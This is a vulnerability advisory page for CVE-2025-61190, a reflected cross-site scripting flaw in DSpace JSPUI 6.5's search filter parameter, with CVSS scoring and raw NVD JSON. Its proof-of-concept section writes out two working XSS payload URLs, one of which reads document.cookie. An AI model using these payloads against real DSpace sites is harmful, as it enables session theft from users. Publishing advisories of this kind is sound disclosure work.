Security Vulnerability Report
中文
CVE-2025-61190 CVSS 6.1 MEDIUM

CVE-2025-61190

Published: 2026-03-27 15:16:46
Last Modified: 2026-03-31 21:11:18

Description

A Reflected Cross-Site Scripting (XSS) vulnerability has been identified in DSpace JSPUI 6.5 within the search/discover filtering functionality. The vulnerability exists due to improper sanitization of user-supplied input via the filter_type_1 parameter.

CVSS Details

CVSS Score
6.1
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:lyrasis:dspace:6.5:*:*:*:*:*:*:* - VULNERABLE
DSpace JSPUI 6.5

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- PoC for CVE-2025-61190 --> <!-- Access the vulnerable endpoint with the payload in the filter_type_1 parameter --> http://target-dspace-url/jspui/search?filter_type_1=<script>alert(document.cookie)</script> <!-- Alternatively, using an image tag to bypass some basic filters --> http://target-dspace-url/jspui/search?filter_type_1=<img src=x onerror=alert('XSS')>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-61190", "sourceIdentifier": "[email protected]", "published": "2026-03-27T15:16:45.750", "lastModified": "2026-03-31T21:11:17.520", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A Reflected Cross-Site Scripting (XSS) vulnerability has been identified in DSpace JSPUI 6.5 within the search/discover filtering functionality. The vulnerability exists due to improper sanitization of user-supplied input via the filter_type_1 parameter."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:lyrasis:dspace:6.5:*:*:*:*:*:*:*", "matchCriteriaId": "6546A606-1253-4B5A-917B-22A2CA1EBD7F"}]}]}], "references": [{"url": "http://dspace.com", "source": "[email protected]", "tags": ["Product"]}, {"url": "http://lyrasis.com", "source": "[email protected]", "tags": ["Product", "Broken Link"]}, {"url": "https://gist.github.com/MerttTuran/9cf7de549749fe3ef7ce08d65e3540bd", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://gist.github.com/MerttTuran/9cf7de549749fe3ef7ce08d65e3540bd", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Third Party Advisory"]}]}}